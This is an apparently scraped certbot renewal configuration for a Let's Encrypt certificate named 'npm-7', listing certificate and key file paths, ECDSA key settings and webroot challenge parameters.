cert = /etc/letsencrypt/live/npm-7/cert.pem
|
||||||
|
privkey = /etc/letsencrypt/live/npm-7/privkey.pem
|
||||||
|
chain = /etc/letsencrypt/live/npm-7/chain.pem
|
||||||
|
fullchain = /etc/letsencrypt/live/npm-7/fullchain.pem
|
||||||
|
[renewalparams]
|
||||||
|
account = ce2ddac5740bb12d4d6591b7fa1728af
|
||||||
|
key_type = ecdsa
|
||||||
|
elliptic_curve = secp384r1
|
||||||
|
preferred_chain = ISRG Root X1
|
||||||
|
pref_challs = http-01,
|
||||||
|
config_dir = /etc/letsencrypt
|
||||||
|
work_dir = /tmp/letsencrypt-lib
|
||||||
|
logs_dir = /data/logs
|
||||||
|
authenticator = webroot
|
||||||
|
webroot_path = /data/letsencrypt-acme-challenge,
|
||||||
|
server = https://acme-v02.api.letsencrypt.org/directory
|
||||||
|
[[webroot_map]]
|
||||||
Reference in New Issue
Block a user